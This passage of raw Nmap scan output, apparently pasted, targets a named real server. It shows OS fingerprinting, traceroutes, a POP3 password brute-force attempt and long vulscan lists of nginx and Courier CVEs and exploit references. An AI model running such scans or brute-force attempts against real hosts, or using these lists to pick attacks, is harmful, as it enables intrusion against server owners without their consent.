6024| [1028544] nginx Bug Lets Remote Users Deny Service or Obtain Potentially Sensitive Information
6025| [1028519] nginx Stack Overflow Lets Remote Users Execute Arbitrary Code
6026| [1026924] nginx Buffer Overflow in ngx_http_mp4_module Lets Remote Users Execute Arbitrary Code
6027| [1026827] nginx HTTP Response Processing Lets Remote Users Obtain Portions of Memory Contents
6028|
6029| OSVDB - http://www.osvdb.org:
6030| [94864] cPnginx Plugin for cPanel nginx Configuration Manipulation Arbitrary File Access
6031| [93282] nginx proxy_pass Crafted Upstream Proxied Server Response Handling Worker Process Memory Disclosure
6032| [93037] nginx /http/ngx_http_parse.c Worker Process Crafted Request Handling Remote Overflow
6033| [92796] nginx ngx_http_close_connection Function Crafted r->
6034| [92634] nginx ngx_http_request.h zero_in_uri URL Null Byte Handling Remote Code Execution
6035| [90518] nginx Log Directory Permission Weakness Local Information Disclosure
6036| [88910] nginx Proxy Functionality SSL Certificate Validation MitM Spoofing Weakness
6037| [84339] nginx/Windows Multiple Request Sequence Parsing Arbitrary File Access
6038| [83617] Naxsi Module for Nginx naxsi-ui/ nx_extract.py Traversal Arbitrary File Access
6039| [81339] nginx ngx_http_mp4_module Module Atom MP4 File Handling Remote Overflow
6040| [80124] nginx HTTP Header Response Parsing Freed Memory Information Disclosure
6041| [77184] nginx ngx_resolver.c ngx_resolver_copy() Function DNS Response Parsing Remote Overflow
6042| [65531] nginx on Windows URI ::$DATA Append Arbitrary File Access
6043| [65530] nginx Encoded Traversal Sequence Memory Corruption Remote DoS
6044| [65294] nginx on Windows Encoded Space Request Remote Source Disclosure
6045| [63136] nginx on Windows 8.3 Filename Alias Request Access Rules / Authentication Bypass
6046| [62617] nginx Internal DNS Cache Poisoning Weakness
6047| [61779] nginx HTTP Request Escape Sequence Terminal Command Injection
6048| [59278] nginx src/http/ngx_http_parse.c ngx_http_process_request_headers() Function URL Handling NULL Dereference DoS
6049| [58328] nginx WebDAV Multiple Method Traversal Arbitrary File Write
6050| [58128] nginx ngx_http_parse_complex_uri() Function Underflow
6051| [44447] nginx (engine x) msie_refresh Directive Unspecified XSS
6052| [44446] nginx (engine x) ssl_verify_client Directive HTTP/0.9 Protocol Bypass
6053| [44445] nginx (engine x) ngx_http_realip_module satisfy_any Directive Unspecified Access Bypass
6054| [44444] nginx (engine x) X-Accel-Redirect Header Unspecified Traversal
6055| [44443] nginx (engine x) rtsig Method Signal Queue Overflow
6056| [44442] nginx (engine x) Worker Process Millisecond Timers Unspecified Overflow
6057|_
6058Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
6059Device type: general purpose
6060Running (JUST GUESSING): Linux 4.X|3.X (90%)
6061OS CPE: cpe:/o:linux:linux_kernel:4.0 cpe:/o:linux:linux_kernel:3.10
6062Aggressive OS guesses: Linux 4.0 (90%), Linux 4.4 (89%), Linux 3.10 (88%), Linux 3.10 - 3.16 (88%), Linux 3.10 - 3.12 (87%), Linux 4.9 (87%)
6063No exact OS matches for host (test conditions non-ideal).
6064Uptime guess: 13.970 days (since Mon Nov 11 11:38:19 2019)
6065Network Distance: 14 hops
6066TCP Sequence Prediction: Difficulty=256 (Good luck!)
6067IP ID Sequence Generation: All zeros
6068
6069TRACEROUTE (using port 80/tcp)
6070HOP RTT ADDRESS
60711 132.28 ms 10.245.200.1
60722 ...
60733 132.87 ms te0-0-2-1.nr11.b069785-0.tll01.atlas.cogentco.com (149.6.188.49)
60744 132.83 ms be2160.rcr51.tll01.atlas.cogentco.com (154.25.10.249)
60755 138.26 ms be3741.ccr22.sto03.atlas.cogentco.com (154.54.60.194)
60766 156.87 ms be2282.ccr42.ham01.atlas.cogentco.com (154.54.72.105)
60777 161.93 ms be2815.ccr41.ams03.atlas.cogentco.com (154.54.38.205)
60788 161.90 ms be2434.agr21.ams03.atlas.cogentco.com (130.117.2.241)
60799 156.14 ms tata.ams03.atlas.cogentco.com (130.117.15.102)
608010 165.76 ms if-ae-15-2.tcore1.pye-paris.as6453.net (195.219.194.146)
608111 172.17 ms te3-1.ew200-411-cr903.euroweb-network.com (80.231.154.50)
608212 175.52 ms 62.100.128.107
608313 181.45 ms 62.100.128.115
608414 185.64 ms vps2330-cloud.sd-france.net (92.39.247.11)
6085
6086NSE: Script Post-scanning.
6087Initiating NSE at 10:55
6088Completed NSE at 10:55, 0.00s elapsed
6089Initiating NSE at 10:55
6090Completed NSE at 10:55, 0.00s elapsed
6091#######################################################################################################################################
6092Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-25 10:55 EST
6093Nmap scan report for vps2330-cloud.sd-france.net (92.39.247.11)
6094Host is up (0.18s latency).
6095
6096PORT STATE SERVICE VERSION
6097110/tcp open pop3 Courier pop3d
6098| pop3-brute:
6099| Accounts: No valid accounts found
6100| Statistics: Performed 23 guesses in 14 seconds, average tps: 1.6
6101|_ ERROR: Failed to connect.
6102|_pop3-capabilities: UIDL USER APOP IMPLEMENTATION(Courier Mail Server) LOGIN-DELAY(10) PIPELINING TOP SASL(LOGIN CRAM-MD5 CRAM-SHA1 CRAM-SHA256 PLAIN) STLS
6103| vulscan: VulDB - https://vuldb.com:
6104| [100906] Accellion FTA WAF Filter courier/1000@/index.html cross site scripting
6105| [11638] Courier MTA Webmail Server 0.73 External File System denial of service
6106| [50729] e-Courier CMS wizard_oe2.asp Wizard_tracking.asp cross site scripting
6107| [50725] e-Courier CMS cross site scripting
6108| [46287] Pre Courier and Cargo Business unknown vulnerability
6109| [45619] Courier-mta Courtier-authlib up to 0.61.1 authpgsqllib.c sql injection
6110| [36320] Double Precision Incorporated courier-imap up to 4.1.1 Login privilege escalation
6111|
6112| MITRE CVE - https://cve.mitre.org:
6113| [CVE-2007-2173] Eval injection vulnerability in (1) courier-imapd.indirect and (2) courier-pop3d.indirect in Courier-IMAP before 4.0.6-r2, and 4.1.x before 4.1.2-r1, on Gentoo Linux allows remote attackers to execute arbitrary commands via the XMAILDIR variable, related to the LOGINRUN variable.
6114| [CVE-2010-1328] Multiple cross-site scripting (XSS) vulnerabilities in TornadoStore 1.4.3 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) tipo or (2) destino parameter to login_registrese.php3 in the Services section, (3) the rubro parameter to precios.php3 in the Products section, (4) the arti parameter to recomenda_articulo.php3 in the Products section, (5) the descrip parameter in a profile action to control/abm_det.php3 in the e-Commerce section, (6) the tit parameter in a delivery_courier action to control/abm_list.php3 in the e-Commerce section, or (7) the tit parameter in an usuario action to control/abm_det.php3 in the e-Commerce section.
6115| [CVE-2010-1327] Multiple SQL injection vulnerabilities in TornadoStore 1.4.3 and earlier allow remote attackers to execute arbitrary SQL commands via (1) the marca parameter to precios.php3 or (2) the where parameter in a delivery_courier action to control/abm_list.php3.
6116| [CVE-2009-3905] Multiple cross-site scripting (XSS) vulnerabilities in e-Courier CMS allow remote attackers to inject arbitrary web script or HTML via the UserGUID parameter to (1) Wizard_tracking.asp, (2) wizard_oe2.asp, (3) your-register.asp, (4) main-whyregister.asp, and (5) your.asp in home/, and other unspecified vectors. NOTE: the provenance of this information is unknown
6117| [CVE-2009-3901] Multiple cross-site scripting (XSS) vulnerabilities in e-Courier CMS allow remote attackers to inject arbitrary web script or HTML via the UserGUID parameter to home/index.asp and other unspecified vectors.
6118| [CVE-2008-7012] courier/1000@/api_error_email.html (aka "error reporting page") in Accellion File Transfer Appliance FTA_7_0_178, and possibly other versions before FTA_7_0_189, allows remote attackers to send spam e-mail via modified description and client_email parameters.
6119| [CVE-2008-6984] Plesk 8.6.0, when short mail login names (SHORTNAMES) are enabled, allows remote attackers to bypass authentication and send spam e-mail via a message with (1) a base64-encoded username that begins with a valid shortname, or (2) a username that matches a valid password, as demonstrated using (a) SMTP and qmail, and (b) Courier IMAP and POP3.
6120| [CVE-2008-6054] PreProjects Pre Courier and Cargo Business stores dbcourior.mdb under the web root with insufficient access control, which allows remote attackers to obtain passwords via a direct request.
6121| [CVE-2008-3850] Cross-site scripting (XSS) vulnerability in Accellion File Transfer FTA_7_0_135 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to courier/forgot_password.html.
6122| [CVE-2008-2667] SQL injection vulnerability in the Courier Authentication Library (aka courier-authlib) before 0.60.6 on SUSE openSUSE 10.3 and 11.0, and other platforms, when MySQL and a non-Latin character set are used, allows remote attackers to execute arbitrary SQL commands via the username and unspecified other vectors.
6123| [CVE-2008-2380] SQL injection vulnerability in authpgsqllib.c in Courier-Authlib before 0.62.0, when a non-Latin locale Postgres database is used, allows remote attackers to execute arbitrary SQL commands via query parameters containing apostrophes.
6124| [CVE-2007-0618] Unspecified vulnerability in (1) pop3d, (2) pop3ds, (3) imapd, and (4) imapds in IBM AIX 5.3.0 has unspecified impact and attack vectors, involving an "authentication vulnerability."
6125| [CVE-2006-6390] Multiple directory traversal vulnerabilities in Open Solution Quick.Cart 2.0, when register_globals is enabled and magic_quotes_gpc is disabled, allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the config[db_type] parameter to (1) categories.php, (2) couriers.php, (3) orders.php, and (4) products.php in actions_admin/
6126| [CVE-2006-2659] libs/comverp.c in Courier MTA before 0.53.2 allows attackers to cause a denial of service (CPU consumption) via unknown vectors involving usernames that contain the "=" (equals) character, which is not properly handled during encoding.
6127| [CVE-2006-2502] Stack-based buffer overflow in pop3d in Cyrus IMAPD (cyrus-imapd) 2.3.2, when the popsubfolders option is enabled, allows remote attackers to execute arbitrary code via a long USER command.
6128| [CVE-2005-3532] authpam.c in courier-authdaemon for Courier Mail Server 0.37.3 through 0.52.1, when using pam_tally, does not call the pam_acct_mgmt function to verify that access should be granted, which allows attackers to authenticate to the server using accounts that have been disabled.
6129| [CVE-2005-2151] spf.c in Courier Mail Server does not properly handle DNS failures when looking up Sender Policy Framework (SPF) records, which could allow attackers to cause memory corruption.
6130| [CVE-2004-0777] Format string vulnerability in the auth_debug function in Courier-IMAP 1.6.0 through 2.2.1 and 3.x through 3.0.3, when login debugging (DEBUG_LOGIN) is enabled, allows remote attackers to execute arbitrary code.
6131| [CVE-2004-0224] Multiple buffer overflows in (1) iso2022jp.c or (2) shiftjis.c for Courier-IMAP before 3.0.0, Courier before 0.45, and SqWebMail before 4.0.0 may allow remote attackers to execute arbitrary code "when Unicode character is out of BMP range."
6132| [CVE-2003-0040] SQL injection vulnerability in the PostgreSQL auth module for courier 0.40 and earlier allows remote attackers to execute SQL code via the user name.
6133| [CVE-2002-1311] Courier sqwebmail before 0.40.0 does not quickly drop privileges after startup in certain cases, which could allow local users to read arbitrary files.
6134| [CVE-2002-0925] Format string vulnerability in mmsyslog function allows remote attackers to execute arbitrary code via (1) the USER command to mmpop3d for mmmail 0.0.13 and earlier, (2) the HELO command to mmsmtpd for mmmail 0.0.13 and earlier, or (3) the USER command to mmftpd 0.0.7 and earlier.
6135| [CVE-2002-0914] Double Precision Courier e-mail MTA allows remote attackers to cause a denial of service (CPU consumption) via a message with an extremely large or negative value for the year, which causes a tight loop.
6136| [CVE-2002-0436] sscd_suncourier.pl CGI script in the Sun Sunsolve CD pack allows remote attackers to execute arbitrary commands via shell metacharacters in the email address parameter.
6137| [CVE-2001-0143] vpop3d program in linuxconf 1.23r and earlier allows local users to overwrite arbitrary files via a symlink attack.
6138| [CVE-2000-1197] POP2 or POP3 server (pop3d) in imap-uw IMAP package on FreeBSD and other operating systems creates lock files with predictable names, which allows local users to cause a denial of service (lack of mail access) for other users by creating lock files for other mail boxes.
6139| [CVE-1999-1445] Vulnerability in imapd and ipop3d in Slackware 3.4 and 3.3 with shadowing enabled, and possibly other operating systems, allows remote attackers to cause a core dump via a short sequence of USER and PASS commands that do not provide valid usernames or passwords.
6140|
6141| SecurityFocus - https://www.securityfocus.com/bid/:
6142| [84605] Pre Courier And Cargo Business CVE-2008-6054 Remote Security Vulnerability
6143| [75469] Courier Mail Server Multiple Memory Corruption Vulnerabilities
6144| [67219] akpop3d 'pszQuery' Remote Memory Corruption Vulnerability
6145| [41970] e-Courier CMS 'UserGUID' Parameter Multiple Cross Site Scripting Vulnerabilities
6146| [39838] tpop3d Remote Denial of Service Vulnerability
6147| [32926] Courier-Authlib Non-Latin Character Handling Postgres SQL Injection Vulnerability
6148| [29605] Courier-Authlib Non-Latin Character Handling SQL Injection Vulnerability
6149| [23589] Courier-IMAP XMAILDIR Shell Command Injection Vulnerability
6150| [22262] IBM AIX Pop3D/Pop3DS/IMapD/IMapDS Authentication Bypass Vulnerability
6151| [18345] Courier Mail Server Username Encoding Remote Denial Of Service Vulnerability
6152| [18056] Cyrus IMAPD POP3D Remote Buffer Overflow Vulnerability
6153| [15771] Courier Mail Server Unauthorized Access Vulnerability
6154| [14135] Courier Mail Server Remote Denial Of Service Vulnerability
6155| [10976] Courier-IMAP Remote Format String Vulnerability
6156| [9845] Courier Multiple Remote Buffer Overflow Vulnerabilities
6157| [8495] akpop3d User Name SQL Injection Vulnerability
6158| [8473] Vpop3d Remote Denial Of Service Vulnerability
6159| [6738] Courier-IMAP Username SQL Injection Vulnerability
6160| [6189] Courier SqWebMail File Disclosure Vulnerability
6161| [4908] Courier MTA Long Year Remote Resource Consumption Vulnerability
6162| [4269] Sun Sunsolve CD SSCD_SunCourier.pl CGI Script Arbitrary Command Execution Vulnerability
6163| [3990] ZPop3D Bad Login Logging Failure Vulnerability
6164| [2781] DynFX MailServer POP3d Denial of Service Vulnerability
6165|
6166| IBM X-Force - https://exchange.xforce.ibmcloud.com:
6167| [54180] e-Courier CMS multiple scripts cross-site scripting
6168| [54143] e-Courier CMS index.asp cross-site scripting
6169| [47494] Courier Authentication Library Postgres SQL injection
6170| [47436] PRE COURIER &
6171| [43628] Novell OpenSUSE courier-authlib SQL injection
6172| [42950] Courier authentication library username SQL injection
6173| [33805] Gentoo Courier-IMAP command execution
6174| [26998] Courier Mail Server libs/comverp.c usernames denial of service
6175| [26578] Cyrus IMAP pop3d buffer overflow
6176| [23532] Courier Mail Server authentication daemon allows deactivated account access
6177| [21565] Courier Mail Server rfc1035/spf.c denial of service
6178| [17034] Courier-IMAP auth_debug format string attack
6179| [15434] Courier Japanese codeset converter buffer overflow
6180| [13018] akpop3d authentication code SQL injection
6181| [11213] Courier-IMAP authpgsqllib username SQL injection
6182| [10643] Courier sqwebmail mail transport agent (MTA) fails to properly enforce permissions
6183| [9228] Courier MTA long year denial of service
6184| [7345] Slackware Linux imapd and ipop3d core dump
6185| [6269] imap, ipop2d and ipop3d buffer overflows
6186| [5923] Linuxconf vpop3d symbolic link
6187| [4918] IPOP3D, Buffer overflow attack
6188| [1560] IPOP3D, user login successful
6189| [1559] IPOP3D user login to remote host successful
6190| [1525] IPOP3D, user logout
6191| [1524] IPOP3D, user auto-logout
6192| [1523] IPOP3D, user login failure
6193| [1522] IPOP3D, brute force attack
6194| [1521] IPOP3D, user kiss of death logout
6195| [418] pop3d mktemp creates insecure temporary files
6196|
6197| Exploit-DB - https://www.exploit-db.com:
6198| [23053] Vpop3d Remote Denial of Service Vulnerability
6199| [21340] Solaris 7.0/8 Sunsolve CD SSCD_SunCourier.pl CGI Script Arbitrary Command Execution Vulnerability
6200| [16836] Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow
6201| [11893] tPop3d 1.5.3 DoS
6202| [2185] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (3)
6203| [2053] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (2)
6204| [1813] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit
6205| [432] Courier-IMAP <= 3.0.2-r1 auth_debug() Remote Format String Exploit
6206|
6207| OpenVAS (Nessus) - http://www.openvas.org:
6208| [63556] Gentoo Security Advisory GLSA 200903-25 (courier-authlib)
6209| [63063] Debian Security Advisory DSA 1688-2 (courier-authlib)
6210| [63031] Debian Security Advisory DSA 1688-1 (courier-authlib)
6211| [61600] Gentoo Security Advisory GLSA 200809-05 (courier-authlib)
6212| [61192] FreeBSD Ports: courier-authlib
6213| [58224] Gentoo Security Advisory GLSA 200704-18 (courier-imap)
6214| [57856] Gentoo Security Advisory GLSA 200608-06 (Courier)
6215| [57001] Debian Security Advisory DSA 1101-1 (courier)
6216| [55972] Debian Security Advisory DSA 917-1 (courier)
6217| [55421] Debian Security Advisory DSA 820-1 (courier)
6218| [55204] Debian Security Advisory DSA 793-1 (courier)
6219| [55165] Debian Security Advisory DSA 784-1 (courier)
6220| [54649] Gentoo Security Advisory GLSA 200408-19 (courier-imap)
6221| [54632] Gentoo Security Advisory GLSA 200408-02 (Courier)
6222| [54531] Gentoo Security Advisory GLSA 200403-06 (Courier)
6223| [53589] Debian Security Advisory DSA 247-1 (courier)
6224| [53441] Debian Security Advisory DSA 197-1 (courier)
6225| [53222] Debian Security Advisory DSA 533-1 (courier)
6226| [52431] FreeBSD Ports: courier
6227| [52418] FreeBSD Ports: courier-imap
6228|
6229| SecurityTracker - https://www.securitytracker.com:
6230| [1016248] Courier Mailing List Manager Lets Remote Users Deny Service
6231| [1014798] Courier Mail Server Error in Processing SPF Responses May Let Remote Users Deny Service
6232| [1010982] Courier-IMAP Format String Flaw in auth_debug() Lets Remote Users Execute Arbitrary Code
6233| [1009455] Courier Mail Server 'iso2022jp' and 'shiftjis' Buffer Overflows May Let Remote Users Execute Arbitrary Code
6234| [1006101] Courier Mail Transfer Agent May Let Remote Users Inject and Execute SQL Statements
6235| [1005639] Courier SqWebMail Privilege Dropping Bug Lets Local Users View Files on the System
6236| [1004433] Courier Mail Server Input Validation Bug Lets Remote Users Send Mail Containing Bogus Dates to Cause the Server to Consume Available CPU Resources
6237|
6238| OSVDB - http://www.osvdb.org:
6239| [86050] Courier Authentication Library (courier-authlib) Multiple Unspecified Issues
6240| [63879] Courier MTA localmailfilter Error Message Handling Remote DoS
6241| [59669] e-Courier CMS home/your.asp UserGUID Parameter XSS
6242| [59668] e-Courier CMS home/main-whyregister.asp UserGUID Parameter XSS
6243| [59667] e-Courier CMS home/your-register.asp UserGUID Parameter XSS
6244| [59666] e-Courier CMS home/wizard_oe2.asp UserGUID Parameter XSS
6245| [59665] e-Courier CMS home/Wizard_tracking.asp UserGUID Parameter XSS
6246| [59662] e-Courier CMS home/index.asp UserGUID Parameter XSS
6247| [50872] Pre Courier and Cargo Business dbcourior.mdb Direct Request Database Disclosure
6248| [50811] Courier Authentication Library authpgsqllib.c Unspecified SQL Injection
6249| [48242] Accellion File Transfer Appliance courier/1000@/api_error_email.html Arbitrary Mail Relay
6250| [47516] openSUSE courier-authlib Unspecified SQL Injection
6251| [46049] Courier Authentication Library Username SQL Injection
6252| [35274] Gentoo courier-imap XMAILDIR Variable Remote Command Injection
6253| [31746] Quick.Cart couriers.php config[db_type] Parameter Traversal Local File Inclusion
6254| [26232] Courier Mail Server Crafted Username Encoding DoS
6255| [25853] Cyrus IMAPD pop3d USER Command Remote Overflow
6256| [21541] Courier Mail Server courier-authdaemon Deactivated Account Authentication Bypass
6257| [17718] Courier Mail Server DNS SPF Record Lookup Failure Memory Corruption DoS
6258| [14521] Courier sqwebmail Startup Sequence Arbitrary File Access
6259| [14459] mmmail mmpop3d USER Command mmsyslog Function Format String
6260| [12033] Slackware Linux imapd/ipop3d Malformed USER/PASS Sequence DoS
6261| [10598] Sun Sunsolve CD Pack sscd_suncourier.pl email Parameter Arbitrary Command Execution
6262| [9506] PostgreSQL Auth Module For Courier User Name Parameter SQL Injection
6263| [9013] Courier-IMAP debug.c auth_debug() Function Remote Format String
6264| [6927] Courier Japanese Codeset shiftjis.c Conversion Overflow
6265| [5857] Linux pop3d Arbitrary Mail File Access
6266| [5052] Double Precision Courier MTA Invalid Year DoS
6267| [4194] Courier Japanese Codeset iso2022jp.c Conversion Overflow
6268| [2471] akpop3d username SQL Injection
6269|_
6270Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
6271Device type: general purpose
6272Running (JUST GUESSING): Linux 3.X|4.X (90%)
6273OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4.4
6274Aggressive OS guesses: Linux 3.10 - 3.16 (90%), Linux 3.10 - 3.12 (89%), Linux 4.4 (89%), Linux 3.10 (88%), Linux 4.0 (88%), Linux 4.9 (87%)
6275No exact OS matches for host (test conditions non-ideal).
6276Network Distance: 14 hops
6277Service Info: Host: localhost.localdomain
6278
6279TRACEROUTE (using port 110/tcp)
6280HOP RTT ADDRESS
62811 130.57 ms 10.245.200.1
62822 ...
62833 127.88 ms te0-0-2-1.nr11.b069785-0.tll01.atlas.cogentco.com (149.6.188.49)
62844 127.80 ms be2160.rcr51.tll01.atlas.cogentco.com (154.25.10.249)
62855 133.22 ms be3740.ccr21.sto03.atlas.cogentco.com (154.54.60.190)
62866 155.20 ms be2281.ccr41.ham01.atlas.cogentco.com (154.54.63.1)
62877 156.63 ms be2816.ccr42.ams03.atlas.cogentco.com (154.54.38.209)
62888 157.01 ms be2440.agr21.ams03.atlas.cogentco.com (130.117.50.6)
62899 156.60 ms tata.ams03.atlas.cogentco.com (130.117.15.102)
629010 166.67 ms if-ae-15-2.tcore1.pye-paris.as6453.net (195.219.194.146)
629111 173.12 ms te3-1.ew200-411-cr903.euroweb-network.com (80.231.154.50)
629212 176.38 ms 62.100.128.107
629313 177.93 ms 62.100.128.115
629414 179.18 ms vps2330-cloud.sd-france.net (92.39.247.11)
6295#######################################################################################################################################
6296Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-25 10:55 EST
6297NSE: Loaded 163 scripts for scanning.
6298NSE: Script Pre-scanning.
6299Initiating NSE at 10:55
6300Completed NSE at 10:55, 0.00s elapsed
6301Initiating NSE at 10:55
6302Completed NSE at 10:55, 0.00s elapsed
6303Initiating Parallel DNS resolution of 1 host. at 10:55
6304Completed Parallel DNS resolution of 1 host. at 10:55, 0.02s elapsed
6305Initiating SYN Stealth Scan at 10:55
6306Scanning vps2330-cloud.sd-france.net (92.39.247.11) [1 port]
6307Discovered open port 443/tcp on 92.39.247.11
6308Completed SYN Stealth Scan at 10:55, 0.22s elapsed (1 total ports)
6309Initiating Service scan at 10:55
6310Scanning 1 service on vps2330-cloud.sd-france.net (92.39.247.11)
6311Completed Service scan at 10:56, 13.12s elapsed (1 service on 1 host)
6312Initiating OS detection (try #1) against vps2330-cloud.sd-france.net (92.39.247.11)
6313Retrying OS detection (try #2) against vps2330-cloud.sd-france.net (92.39.247.11)
6314Initiating Traceroute at 10:56
6315Completed Traceroute at 10:56, 3.01s elapsed
6316Initiating Parallel DNS resolution of 13 hosts. at 10:56
6317Completed Parallel DNS resolution of 13 hosts. at 10:56, 0.24s elapsed
6318NSE: Script scanning 92.39.247.11.
6319Initiating NSE at 10:56
6320Completed NSE at 10:57, 79.48s elapsed
6321Initiating NSE at 10:57
6322Completed NSE at 10:57, 1.59s elapsed
6323Nmap scan report for vps2330-cloud.sd-france.net (92.39.247.11)
6324Host is up (0.18s latency).
6325
6326PORT STATE SERVICE VERSION
6327443/tcp open ssl/http nginx
6328| http-brute:
6329|_ Path "/" does not require authentication
6330|_http-chrono: Request times for /; avg: 1146.59ms; min: 1040.57ms; max: 1325.19ms
6331|_http-csrf: Couldn't find any CSRF vulnerabilities.
6332|_http-date: Mon, 25 Nov 2019 15:56:12 GMT; -3s from local time.
6333|_http-devframework: Couldn't determine the underlying framework or CMS. Try increasing 'httpspider.maxpagecount' value to spider more pages.
6334|_http-dombased-xss: Couldn't find any DOM based XSS.
6335|_http-drupal-enum: Nothing found amongst the top 100 resources,use --script-args number=<number|all> for deeper analysis)
6336|_http-errors: Couldn't find any error pages.
6337|_http-feed: Couldn't find any feeds.
6338|_http-fetch: Please enter the complete path of the directory to save data in.
6339| http-headers:
6340| Server: nginx
6341| Date: Mon, 25 Nov 2019 15:56:24 GMT
6342| Content-Type: text/html
6343| Content-Length: 3734
6344| Connection: close
6345| Last-Modified: Mon, 01 Apr 2019 15:47:08 GMT
6346| ETag: "e96-58579eee02177"
6347| Accept-Ranges: bytes
6348|
6349|_ (Request type: HEAD)
6350|_http-jsonp-detection: Couldn't find any JSONP endpoints.
6351| http-methods:
6352|_ Supported Methods: GET HEAD POST OPTIONS
6353|_http-mobileversion-checker: No mobile version detected.
6354|_http-php-version: Credits query returned unknown hash fdae9c5d1a897cec8782556f059b1349
6355| http-security-headers:
6356| Strict_Transport_Security:
6357|_ HSTS not configured in HTTPS Server
6358| http-sitemap-generator:
6359| Directory structure:
6360| /
6361| Other: 1; ico: 1
6362| /css/
6363| css: 1
6364| /img/
6365| png: 1
6366| Longest directory structure:
6367| Depth: 1
6368| Dir: /css/
6369| Total files found (by extension):
6370|_ Other: 1; css: 1; ico: 1; png: 1
6371|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
6372|_http-title: Web Server's Default Page
6373| http-vhosts:
6374|_127 names had status 200
6375|_http-wordpress-enum: Nothing found amongst the top 100 resources,use --script-args search-limit=<number|all> for deeper analysis)
6376|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
6377|_http-xssed: No previously reported XSS vuln.
6378| vulscan: VulDB - https://vuldb.com:
6379| [133852] Sangfor Sundray WLAN Controller up to 3.7.4.2 Cookie Header nginx_webconsole.php Code Execution
6380| [132132] SoftNAS Cloud 4.2.0/4.2.1 Nginx privilege escalation
6381| [131858] Puppet Discovery up to 1.3.x Nginx Container weak authentication
6382| [130644] Nginx Unit up to 1.7.0 Router Process Request Heap-based memory corruption
6383| [127759] VeryNginx 0.3.3 Web Application Firewall privilege escalation
6384| [126525] nginx up to 1.14.0/1.15.5 ngx_http_mp4_module Loop denial of service
6385| [126524] nginx up to 1.14.0/1.15.5 HTTP2 CPU Exhaustion denial of service
6386| [126523] nginx up to 1.14.0/1.15.5 HTTP2 Memory Consumption denial of service
6387| [119845] Pivotal Operations Manager up to 2.0.13/2.1.5 Nginx privilege escalation
6388| [114368] SuSE Portus 2.3 Nginx Certificate weak authentication
6389| [103517] nginx up to 1.13.2 Range Filter Request Integer Overflow memory corruption
6390| [89849] nginx RFC 3875 Namespace Conflict Environment Variable Open Redirect
6391| [87719] nginx up to 1.11.0 ngx_files.c ngx_chain_to_iovec denial of service
6392| [80760] nginx 0.6.18/1.9.9 DNS CNAME Record Crash denial of service
6393| [80759] nginx 0.6.18/1.9.9 DNS CNAME Record Use-After-Free denial of service
6394| [80758] nginx 0.6.18/1.9.9 DNS UDP Packet Crash denial of service
6395| [67677] nginx up to 1.7.3 SSL weak authentication
6396| [67296] nginx up to 1.7.3 SMTP Proxy ngx_mail_smtp_starttls privilege escalation
6397| [12822] nginx up to 1.5.11 SPDY SPDY Request Heap-based memory corruption
6398| [12824] nginx 1.5.10 on 32-bit SPDY memory corruption
6399| [11237] nginx up to 1.5.6 URI String Bypass privilege escalation
6400| [65364] nginx up to 1.1.13 Default Configuration information disclosure
6401| [8671] nginx up to 1.4 proxy_pass denial of service
6402| [8618] nginx 1.3.9/1.4.0 http/ngx_http_parse.c ngx_http_parse_chunked() memory corruption
6403| [7247] nginx 1.2.6 Proxy Function spoofing
6404| [61434] nginx 1.2.0/1.3.0 on Windows Access Restriction privilege escalation
6405| [5293] nginx up to 1.1.18 ngx_http_mp4_module MP4 File memory corruption
6406| [4843] nginx up to 1.0.13/1.1.16 HTTP Header Response Parser ngx_http_parse.c information disclosure
6407| [59645] nginx up to 0.8.9 Heap-based memory corruption
6408| [53592] nginx 0.8.36 memory corruption
6409| [53590] nginx up to 0.8.9 unknown vulnerability
6410| [51533] nginx 0.7.64 Terminal privilege escalation
6411| [50905] nginx up to 0.8.9 directory traversal
6412| [50903] nginx up to 0.8.10 NULL Pointer Dereference denial of service
6413| [50043] nginx up to 0.8.10 memory corruption
6414|
6415| MITRE CVE - https://cve.mitre.org:
6416| [CVE-2013-2070] http/modules/ngx_http_proxy_module.c in nginx 1.1.4 through 1.2.8 and 1.3.0 through 1.4.0, when proxy_pass is used with untrusted HTTP servers, allows remote attackers to cause a denial of service (crash) and obtain sensitive information from worker process memory via a crafted proxy response, a similar vulnerability to CVE-2013-2028.
6417| [CVE-2013-2028] The ngx_http_parse_chunked function in http/ngx_http_parse.c in nginx 1.3.9 through 1.4.0 allows remote attackers to cause a denial of service (crash) and execute arbitrary code via a chunked Transfer-Encoding request with a large chunk size, which triggers an integer signedness error and a stack-based buffer overflow.
6418| [CVE-2012-3380] Directory traversal vulnerability in naxsi-ui/nx_extract.py in the Naxsi module before 0.46-1 for Nginx allows local users to read arbitrary files via unspecified vectors.
6419| [CVE-2012-2089] Buffer overflow in ngx_http_mp4_module.c in the ngx_http_mp4_module module in nginx 1.0.7 through 1.0.14 and 1.1.3 through 1.1.18, when the mp4 directive is used, allows remote attackers to cause a denial of service (memory overwrite) or possibly execute arbitrary code via a crafted MP4 file.
6420| [CVE-2012-1180] Use-after-free vulnerability in nginx before 1.0.14 and 1.1.x before 1.1.17 allows remote HTTP servers to obtain sensitive information from process memory via a crafted backend response, in conjunction with a client request.
6421| [CVE-2011-4963] nginx/Windows 1.3.x before 1.3.1 and 1.2.x before 1.2.1 allows remote attackers to bypass intended access restrictions and access restricted files via (1) a trailing . (dot) or (2) certain "$index_allocation" sequences in a request.
6422| [CVE-2011-4315] Heap-based buffer overflow in compression-pointer processing in core/ngx_resolver.c in nginx before 1.0.10 allows remote resolvers to cause a denial of service (daemon crash) or possibly have unspecified other impact via a long response.
6423| [CVE-2010-2266] nginx 0.8.36 allows remote attackers to cause a denial of service (crash) via certain encoded directory traversal sequences that trigger memory corruption, as demonstrated using the "%c0.%c0." sequence.
6424| [CVE-2010-2263] nginx 0.8 before 0.8.40 and 0.7 before 0.7.66, when running on Windows, allows remote attackers to obtain source code or unparsed content of arbitrary files under the web document root by appending ::$DATA to the URI.
